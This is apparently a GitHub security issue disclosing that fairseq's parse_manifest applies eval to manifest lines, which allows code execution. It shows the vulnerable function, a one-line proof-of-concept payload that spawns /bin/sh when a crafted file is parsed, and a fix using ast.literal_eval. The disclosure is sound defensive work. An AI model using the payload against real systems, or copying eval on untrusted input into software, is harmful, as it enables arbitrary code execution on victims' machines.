Dangerous parser implementation (fairseq.data.codedataset.parse_manifest) can cause RCE when parsing a maliciously crafted file. #4869

Open
Lyutoon opened this issue Nov 17, 2022 · 0 comments

🐛 Bug

fairseq.data.codedataset.parse_manifest calls the dangerous built-in eval on its input. parse_manifest is commonly used to parse the manifest file when loading data (see the official example https://github.com/facebookresearch/fairseq/blob/b5a039c292facba9c73f59ff34621ec131d82341/examples/textless_nlp/pgslm/prepare_dataset.py). It performs no security check on the incoming file and simply applies eval to every line it reads. If an attacker crafts a malicious file and submits it to a server, or hands it to someone who loads it without inspecting it, the result is remote code execution (RCE).

However, look at the if-else logic in the function:

def parse_manifest(manifest, dictionary):
    audio_files = []
    codes = []
    durations = []
    speakers = []

    with open(manifest) as info:
        for line in info.readlines():
            sample = eval(line.strip())
            if "cpc_km100" in sample:
                k = "cpc_km100"
            elif "hubert_km100" in sample:
                k = "hubert_km100"
            elif "phone" in sample:
                k = "phone"
            else:
                assert False, "unknown format"
            code = sample[k]
            code, duration = parse_code(code, dictionary, append_eos=True)

            codes.append(code)
            durations.append(duration)
            audio_files.append(sample["audio"])
            speakers.append(sample.get("speaker", None))

    return audio_files, codes, durations, speakers

The checks only involve str values, so there is actually no need to use eval.
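As a rough illustration of why eval is unnecessary here, the sketch below parses one manifest-style line with ast.literal_eval from the standard library. The sample line is an assumption inferred from the keys the function reads ("audio", "hubert_km100"); it is not taken from a real fairseq manifest, and parse_line is a hypothetical helper name.

```python
import ast


def parse_line(line):
    # literal_eval accepts only Python literals (dict, str, list, numbers, ...)
    # and never calls functions or resolves names.
    return ast.literal_eval(line.strip())


# Assumed line format: a dict literal with string keys and string values.
good = "{'audio': 'a.wav', 'hubert_km100': '1 1 2'}\n"
sample = parse_line(good)

# The same membership test and lookups used by parse_manifest work unchanged.
has_code = "hubert_km100" in sample
audio = sample["audio"]

# The payload from this report is a function call, not a literal, so it is refused.
payload = "__import__('os').system('/bin/sh')"
try:
    parse_line(payload)
    rejected = False
except ValueError:
    rejected = True
```

Under these assumptions, a well-formed line still yields a dict, while a line containing a call raises ValueError instead of being executed.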

To Reproduce

Here is a minimal example.
First, construct a malicious file:

echo "__import__('os').system('/bin/sh')" > evil_file

Second, parse it:

from fairseq.data.codedataset import parse_manifest

parse_manifest('evil_file', None)
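For anyone who wants to confirm the behavior without spawning a shell or installing fairseq, the following is a minimal sketch that mirrors only the vulnerable pattern (eval on a stripped line). The helper eval_first_line and the marker-file payload are hypothetical stand-ins, not fairseq code; the payload merely creates an empty file inside a temporary directory.

```python
import os
import tempfile


def eval_first_line(path):
    # Mirrors the pattern in parse_manifest: eval applied to a line of the file.
    with open(path) as info:
        return eval(info.readline().strip())


with tempfile.TemporaryDirectory() as tmp:
    marker = os.path.join(tmp, "marker")
    manifest = os.path.join(tmp, "manifest")

    # Harmless payload: an expression that creates an empty marker file.
    with open(manifest, "w") as f:
        f.write(f"open({marker!r}, 'w').close()\n")

    eval_first_line(manifest)
    # If the marker exists, code embedded in the file was executed.
    marker_created = os.path.exists(marker)

print(marker_created)
```

The marker file appearing shows that whatever expression the file contains is run with the privileges of the loading process.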

Environment

  • fairseq Version: 0.12.2
  • OS: linux
  • How you installed fairseq: pip
  • Python version: 3.8.10

Additional context

This is easy to fix: just do not use eval. If the code only needs to work on str values, use str(); otherwise use ast.literal_eval().
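One possible shape of the literal_eval fix is sketched below. It is not the fairseq implementation: parse_manifest_lines is a hypothetical helper that takes an iterable of lines and returns the raw code strings rather than calling fairseq's parse_code, so that it runs without fairseq installed. It also skips blank lines and raises ValueError instead of using assert, both of which are assumptions about desirable behavior.

```python
import ast

# Keys checked by the original parse_manifest, in the same priority order.
CODE_KEYS = ("cpc_km100", "hubert_km100", "phone")


def parse_manifest_lines(lines):
    """Hypothetical helper: parse manifest lines without executing them."""
    audio_files, raw_codes, speakers = [], [], []
    for lineno, line in enumerate(lines, start=1):
        line = line.strip()
        if not line:
            continue  # assumption: blank lines are ignored
        try:
            sample = ast.literal_eval(line)
        except (ValueError, SyntaxError, TypeError) as exc:
            raise ValueError(f"line {lineno}: not a Python literal") from exc
        if not isinstance(sample, dict):
            raise ValueError(f"line {lineno}: expected a dict")
        # Pick the first known code key present in the sample.
        key = next((k for k in CODE_KEYS if k in sample), None)
        if key is None:
            raise ValueError(f"line {lineno}: unknown format")
        audio_files.append(sample["audio"])
        raw_codes.append(sample[key])
        speakers.append(sample.get("speaker"))
    return audio_files, raw_codes, speakers
```

In a real patch, the raw code strings would presumably still be passed to parse_code with the dictionary, as the current function does; only the eval call needs to change.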
